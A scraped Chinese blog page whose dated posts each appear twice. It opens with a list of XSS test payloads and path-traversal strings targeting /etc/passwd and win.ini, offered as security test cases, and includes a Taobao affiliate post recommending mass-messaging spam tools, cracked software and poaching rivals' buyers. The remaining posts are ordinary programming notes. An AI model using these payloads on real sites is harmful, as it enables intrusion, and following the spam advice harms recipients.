10月25
很多网站存在xss 跨站脚本漏洞,下面的安全测试测用例还是挺管用的,能够查找和发现潜在的bug,大家可以试试看吧。
<script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22x ss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
<script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp
%22%3cscript%3ealert(%22x ss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22x ss%22)%3c/script%3e
%3cscript%3ealert(%22x ss%22)%3c/script%3e/index.html
<script>alert('Vulnerable');</script>
<script>alert('Vulnerable')</script>
10月25
最近通过Heck博客向我咨询的朋友有很多,一般情况下只要有时间我都非常乐意聊会,对于网络赚钱专职还是兼职这个问题Heck认为非常有必要专门写篇文章和大家交流下,也给很多想进入网络赚钱这行的朋友作个参考。
无论您是否想专职还是兼职做网络赚钱这行,首先必须弄明白一个问题:网络是否真的能赚钱?我可以非常明确的告诉你网络赚钱是真实可行的,但是想赚更多也不是件容易的事情!
接下来Heck分别对网络赚钱专职和兼职做个简单的对比:
1.网络赚钱专职
优点:自由,你可以每天工作2个小时,或者今天心情不好也可以不工作,没有人管你;你可以穿着睡衣躺在床上工作,你也可以一边在线看电影、听歌一边工作,甚至是抱着GF或者Baby也可以。
缺点:你的圈子很小,除了每天能接触到的家人就是电脑,没有上班族的三天一小聚五天一大聚的的朋友圈子,时间长了你会发现你的生活就那么大点范围。
2.网络赚钱兼职
优点:自由,没错!兼职做网络赚钱是个好的主意,正常收入之余还能搞点额外收入,而且还没有任何的限制。
缺点:不能说兼职一定赚不了太多的钱,但是当每天繁忙的工作结束后回家还得工作是挺辛苦的。
“哥们,你是做什么的?”
“搞网络的。”
“高科技,不错,在哪上班?”
“还行吧,在家。”
在现实社会中,一般人都会认为只要是不出去上班而成天窝在家里的人是很没出息的,甚至包括自己的父母亲戚朋友等,当然,除非你的收入比那些上班的多!但是对此就引出一个问题:如果你对网络赚钱这行业是刚刚接触就想专职做的话,那你就得考虑来自各方面的压力,当然也包括自己给自己的压力。
无论您是否想专职还是兼职做网络赚钱这行,首先必须弄明白一个问题:网络是否真的能赚钱?我可以非常明确的告诉你网络赚钱是真实可行的,但是想赚更多也不是件容易的事情!
接下来Heck分别对网络赚钱专职和兼职做个简单的对比:
1.网络赚钱专职
优点:自由,你可以每天工作2个小时,或者今天心情不好也可以不工作,没有人管你;你可以穿着睡衣躺在床上工作,你也可以一边在线看电影、听歌一边工作,甚至是抱着GF或者Baby也可以。
缺点:你的圈子很小,除了每天能接触到的家人就是电脑,没有上班族的三天一小聚五天一大聚的的朋友圈子,时间长了你会发现你的生活就那么大点范围。
2.网络赚钱兼职
优点:自由,没错!兼职做网络赚钱是个好的主意,正常收入之余还能搞点额外收入,而且还没有任何的限制。
缺点:不能说兼职一定赚不了太多的钱,但是当每天繁忙的工作结束后回家还得工作是挺辛苦的。
“哥们,你是做什么的?”
“搞网络的。”
“高科技,不错,在哪上班?”
“还行吧,在家。”
在现实社会中,一般人都会认为只要是不出去上班而成天窝在家里的人是很没出息的,甚至包括自己的父母亲戚朋友等,当然,除非你的收入比那些上班的多!但是对此就引出一个问题:如果你对网络赚钱这行业是刚刚接触就想专职做的话,那你就得考虑来自各方面的压力,当然也包括自己给自己的压力。
10月25
已经好久没去阿里妈妈论坛混了,今天去看了看,发现一篇关于淘宝客的推广方法介绍的还算全面。整理了一下给大家,希望会有用。
方法其实不是最重要的,重在坚持,找到一种最适合自己的方法,然后坚持走下去,肯定会收效的。
1、SNS网店软文推广法:现在SNS类型的网店非常流行,去SNS网店主要是去几个有人气的SNS网店有针对性的加几百上千个用户。然后选择合适的软文并合理的附带上网店链接,发表到自己的日志里。再让自的一些好友分享,这样就让很多人都关注到你的文章,关注到了你的网店。
2、SNS网店API合作推广法:如果你自己或下面的员工有一定的技术实力,可以开发一些和自己网店产品相关的小插件,插到校内上,插到海内上。只要有开放API的SNS网店都去插下。现在很多网店都有在这么搞,去校内看看哪些开放的应用程序,很多都是一些小网店提供的,而且上面都或多或少有挂自己网店的广告。而且这个市场越早做越好,很多SNS网店都是才开始尝试开发API,审核的要求还不是特别严格。等以后做的网店多了,再想插到SNS网店里去就难了。
3、收藏夹推广法:把一些精彩内容的页面添加到QQ书签,百度搜藏,雅虎收藏等,让喜欢这些内容的网民去阅读,收藏。
4、版主联盟推广法:这个方法适合论坛社区网店的推广。也就是先去加入一些版主联盟,像大旗版主联盟就很不错,每天把论坛的一些精彩内容提交上去,等待被相关频道录用,一经录用,那就会给你带去不少的IP.我最多的一次是两天就给网店带去了3W多的IP点击量。
5、回复置顶推广法:其实这个方法我也不知道该叫什么名字,它的局限性很小,据我所知,只使用于猫扑大杂烩,就暂且叫回复置顶吧。这个方法是我偶然发现的,是在看网店IP来路的时候发现的,发现那天有200多的IP来自猫扑的一个帖子,但是我知道我们没有去那里发过推广帖,所以觉得有点奇怪,就去那个帖子看看,发现是有人放了我们网店的一个链接,并且回复置顶了,所以才给我们带来了200多的IP.后来我就去和一些常在猫扑混的网友聊,才知道可以用一种叫“月明符”的道具来置顶回复。版主还不能删,只要管理员才有权删,所以一般情况下都能置顶一段时间。
方法其实不是最重要的,重在坚持,找到一种最适合自己的方法,然后坚持走下去,肯定会收效的。
1、SNS网店软文推广法:现在SNS类型的网店非常流行,去SNS网店主要是去几个有人气的SNS网店有针对性的加几百上千个用户。然后选择合适的软文并合理的附带上网店链接,发表到自己的日志里。再让自的一些好友分享,这样就让很多人都关注到你的文章,关注到了你的网店。
2、SNS网店API合作推广法:如果你自己或下面的员工有一定的技术实力,可以开发一些和自己网店产品相关的小插件,插到校内上,插到海内上。只要有开放API的SNS网店都去插下。现在很多网店都有在这么搞,去校内看看哪些开放的应用程序,很多都是一些小网店提供的,而且上面都或多或少有挂自己网店的广告。而且这个市场越早做越好,很多SNS网店都是才开始尝试开发API,审核的要求还不是特别严格。等以后做的网店多了,再想插到SNS网店里去就难了。
3、收藏夹推广法:把一些精彩内容的页面添加到QQ书签,百度搜藏,雅虎收藏等,让喜欢这些内容的网民去阅读,收藏。
4、版主联盟推广法:这个方法适合论坛社区网店的推广。也就是先去加入一些版主联盟,像大旗版主联盟就很不错,每天把论坛的一些精彩内容提交上去,等待被相关频道录用,一经录用,那就会给你带去不少的IP.我最多的一次是两天就给网店带去了3W多的IP点击量。
5、回复置顶推广法:其实这个方法我也不知道该叫什么名字,它的局限性很小,据我所知,只使用于猫扑大杂烩,就暂且叫回复置顶吧。这个方法是我偶然发现的,是在看网店IP来路的时候发现的,发现那天有200多的IP来自猫扑的一个帖子,但是我知道我们没有去那里发过推广帖,所以觉得有点奇怪,就去那个帖子看看,发现是有人放了我们网店的一个链接,并且回复置顶了,所以才给我们带来了200多的IP.后来我就去和一些常在猫扑混的网友聊,才知道可以用一种叫“月明符”的道具来置顶回复。版主还不能删,只要管理员才有权删,所以一般情况下都能置顶一段时间。
10月25
网络赚钱其实不是空想,有些人做站或者开网店一天收入上千上万都有,靠的是什么?其实很简单,主要是网赚项目选择得对不对,下面是关于利用淘宝做淘宝客的思路。
本来这个项目是想我自己的做的但是我最近太忙了没有时间所以我才吐血我的这个网赚思路分享出来,先说明这个项目我没有做过但是如果会做的人绝对能够挣到钱的。
思路主要就是利用淘宝网来做淘宝客,用的工具用阿里旺旺,再就是阿里旺旺群发器,已经若干个阿里旺旺的账号,当然还要有支付宝账号,当然是收钱用的,最主要的就是有时间跟耐心。
现在我来讲一下做这个项目需要什么:
第一:我们需要的是一个阿里旺旺的聊天软件,我想这个大家都很熟悉了跟QQ是一样的,如果没有的朋友可以去下载安装。这里注意一定要下载使用2009版 的阿里旺旺,带回我会告诉大家为什么需要09版的旺旺。
第二:我们需要的是一款能够群发的阿里旺旺群发软件,比如:群发宝宝.千里马旺旺群发.赛翔旺旺群发,王牌阿里旺旺群发,在这里注意的是你可以花钱去买正版软件你也可以去在网上找破解版,我也看过很多阿里旺旺全发软件他们支持的版本都是2009版.所以我才教大家去下载09版的旺旺,一般的卖群发软件的都会告诉你这个问题的。在这里我们只用到的功能就是群发跟挖墙脚,挖墙角就是把别人的买家通过软件加到自己的阿里旺旺上。
本来这个项目是想我自己的做的但是我最近太忙了没有时间所以我才吐血我的这个网赚思路分享出来,先说明这个项目我没有做过但是如果会做的人绝对能够挣到钱的。
思路主要就是利用淘宝网来做淘宝客,用的工具用阿里旺旺,再就是阿里旺旺群发器,已经若干个阿里旺旺的账号,当然还要有支付宝账号,当然是收钱用的,最主要的就是有时间跟耐心。
现在我来讲一下做这个项目需要什么:
第一:我们需要的是一个阿里旺旺的聊天软件,我想这个大家都很熟悉了跟QQ是一样的,如果没有的朋友可以去下载安装。这里注意一定要下载使用2009版 的阿里旺旺,带回我会告诉大家为什么需要09版的旺旺。
第二:我们需要的是一款能够群发的阿里旺旺群发软件,比如:群发宝宝.千里马旺旺群发.赛翔旺旺群发,王牌阿里旺旺群发,在这里注意的是你可以花钱去买正版软件你也可以去在网上找破解版,我也看过很多阿里旺旺全发软件他们支持的版本都是2009版.所以我才教大家去下载09版的旺旺,一般的卖群发软件的都会告诉你这个问题的。在这里我们只用到的功能就是群发跟挖墙脚,挖墙角就是把别人的买家通过软件加到自己的阿里旺旺上。
10月25
跨域问题是由浏览器安全性限制而引起的,不同浏览器的安全性限制还不一样,当然啦我们可以采取变通的方法来解决这个跨域的问题。
方法一、采用动态创建<script type="text/javascript" src="http://另外一个域名/getdata.aspx?user=Heck&pwd=Heck"></script>
而这个aspx可以返回一段JS数据,来回调调用页面中的一个JS方法 比如说 showmessage("返回成功"); 这样可以达到隐性提交的目的。(在跨域下可以实现JAX同样的效果)。但这种方法由于URL长度的限制,不能提交太大的数据,和不能进行POST请求,而且你还要又B域的输出控制权。
方法二、直接把表单提交,提交的页面处理完毕后他直接太跳转下,同时把相关信息在提交给相同的域名下的一个文件,由本域名下的文件做输出这样其实就是同域了。不过这种方法编程会很复杂,流程控制很麻烦。
方法三、采用ASPX文件做桥的方式,比如说 你想在A上请求B域名上的文件b,则你可以通过在A上请求A上的文件a,a在服务器端请求B下的b,a文件相当于做了个中装,这样在有些网站上是不可取的,因为效率不高,相应很慢,还耗费服务器带宽等资源。
方法一、采用动态创建<script type="text/javascript" src="http://另外一个域名/getdata.aspx?user=Heck&pwd=Heck"></script>
而这个aspx可以返回一段JS数据,来回调调用页面中的一个JS方法 比如说 showmessage("返回成功"); 这样可以达到隐性提交的目的。(在跨域下可以实现JAX同样的效果)。但这种方法由于URL长度的限制,不能提交太大的数据,和不能进行POST请求,而且你还要又B域的输出控制权。
方法二、直接把表单提交,提交的页面处理完毕后他直接太跳转下,同时把相关信息在提交给相同的域名下的一个文件,由本域名下的文件做输出这样其实就是同域了。不过这种方法编程会很复杂,流程控制很麻烦。
方法三、采用ASPX文件做桥的方式,比如说 你想在A上请求B域名上的文件b,则你可以通过在A上请求A上的文件a,a在服务器端请求B下的b,a文件相当于做了个中装,这样在有些网站上是不可取的,因为效率不高,相应很慢,还耗费服务器带宽等资源。
10月24
记得前段时间,好几次面试都有问到我这个问题,也就是怎么查询数据库中重复的数据呢,并且还需要把重复数据据替换掉,现在做个笔记方便自己以后复习和查找,也给大家分享供大家参考下。
一、在一张表中某个字段下面有重复记录,有很多方法,但是有一个方法,是比较高效的,如下语句:
select data_guid from adam_entity_datas a where a.rowid > (select min(b.rowid) from adam_entity_datas b where b.data_guid = a.data_guid)
如果表中有大量数据,但是重复数据比较少,那么可以用下面的语句提高效率
select data_guid from adam_entity_datas where data_guid in (select data_guid from adam_entity_datas group by data_guid having count(*) > 1)
此方法查询出所有重复记录了,也就是说,只要是重复的就选出来,下面的语句也许更高效
select data_guid from adam_entity_datas where rowid in (select rid from (select rowid rid,row_number()over(partition by data_guid order by rowid) m from adam_entity_datas) where m <> 1)
目前只知道这三种比较有效的方法。
第一种方法比较好理解,但是最慢,第二种方法最快,但是选出来的记录是所有重复的记录,而不是一个重复记录的列表,第三种方法,我认为最好。
一、在一张表中某个字段下面有重复记录,有很多方法,但是有一个方法,是比较高效的,如下语句:
select data_guid from adam_entity_datas a where a.rowid > (select min(b.rowid) from adam_entity_datas b where b.data_guid = a.data_guid)
如果表中有大量数据,但是重复数据比较少,那么可以用下面的语句提高效率
select data_guid from adam_entity_datas where data_guid in (select data_guid from adam_entity_datas group by data_guid having count(*) > 1)
此方法查询出所有重复记录了,也就是说,只要是重复的就选出来,下面的语句也许更高效
select data_guid from adam_entity_datas where rowid in (select rid from (select rowid rid,row_number()over(partition by data_guid order by rowid) m from adam_entity_datas) where m <> 1)
目前只知道这三种比较有效的方法。
第一种方法比较好理解,但是最慢,第二种方法最快,但是选出来的记录是所有重复的记录,而不是一个重复记录的列表,第三种方法,我认为最好。
10月24
1.报错除了报如题的错误外,还报了error listenerStart的错误。项目是从svn检出来的,虽然包已经放到lib中。但实际并未加到path的Libraries里,因此build path中的libraries选项卡点add jars。把没加进的包加进去就可以了。
2.把X:\workspace\.metadata\.plugins\org.eclipse.wst.server.core\temp0\work删除掉,clean项目,重新启动tomcat即可。
3.jre版本的问题。在java的compile下面选对应的jre即可。
2.把X:\workspace\.metadata\.plugins\org.eclipse.wst.server.core\temp0\work删除掉,clean项目,重新启动tomcat即可。
3.jre版本的问题。在java的compile下面选对应的jre即可。
10月24
在java或者jsp中实现下载文件代码如下:
<%@ page language="java" pageEncoding="gb2312"
import="tk.Heck.until.*" import="java.sql.*"
contentType="text/html;charset=GB2312"%>
<%@ page
import="tk.Heck .services.*,java.io.*, java.util.*, java.text.*"%>
<jsp:directive.page import="java.util.Date" />
<%
//String path = request.getContextPath();
//String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
String zygx_id=request.getParameter("zygxid");
String zygxurl=request.getParameter("zygxurl");
String zygxYwjm=request.getParameter("zygxywjm");
zygxurl = zygxurl.substring(zygxurl.lastIndexOf("/"),zygxurl.length());//截取url中文件名
Str str=new Str();
int zygxid=str.parseInt(zygx_id);
%>
<%@ page language="java" pageEncoding="gb2312"
import="tk.Heck.until.*" import="java.sql.*"
contentType="text/html;charset=GB2312"%>
<%@ page
import="tk.Heck .services.*,java.io.*, java.util.*, java.text.*"%>
<jsp:directive.page import="java.util.Date" />
<%
//String path = request.getContextPath();
//String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
String zygx_id=request.getParameter("zygxid");
String zygxurl=request.getParameter("zygxurl");
String zygxYwjm=request.getParameter("zygxywjm");
zygxurl = zygxurl.substring(zygxurl.lastIndexOf("/"),zygxurl.length());//截取url中文件名
Str str=new Str();
int zygxid=str.parseInt(zygx_id);
%>
10月24
我们在java中用SAX方式解析XML,XML文件如下:
<?xml version="1.0" encoding="gb2312"?>
<person>
<name>姜军</name>
<college>信息学院</college>
<telephone>6258113</telephone>
<notes>男,1985年生,将军 ,95年调入广州军区</notes>
</person>
<?xml version="1.0" encoding="gb2312"?>
<person>
<name>姜军</name>
<college>信息学院</college>
<telephone>6258113</telephone>
<notes>男,1985年生,将军 ,95年调入广州军区</notes>
</person>
10月24
首先要引入using System.Text.RegularExpressions;
string pattern = @"^[a-zA-Z0-9]+$";//正则式子
string param1 = null;
Match m = Regex.Match(this.textBox1.Text, pattern); // 匹配正则表达式,把this.textBox1.Text跟pattern正则对比
if (!m.Success) // 判断输入的是不是英文和数字,不是进入
{
param1 = this.textBox1.Text;//将现在textBox的值保存下来
// 将光标定位到文本框的最后
this.textBox1.SelectionStart = this.textBox1.Text.Length;
}
string pattern = @"^[a-zA-Z0-9]+$";//正则式子
string param1 = null;
Match m = Regex.Match(this.textBox1.Text, pattern); // 匹配正则表达式,把this.textBox1.Text跟pattern正则对比
if (!m.Success) // 判断输入的是不是英文和数字,不是进入
{
param1 = this.textBox1.Text;//将现在textBox的值保存下来
// 将光标定位到文本框的最后
this.textBox1.SelectionStart = this.textBox1.Text.Length;
}
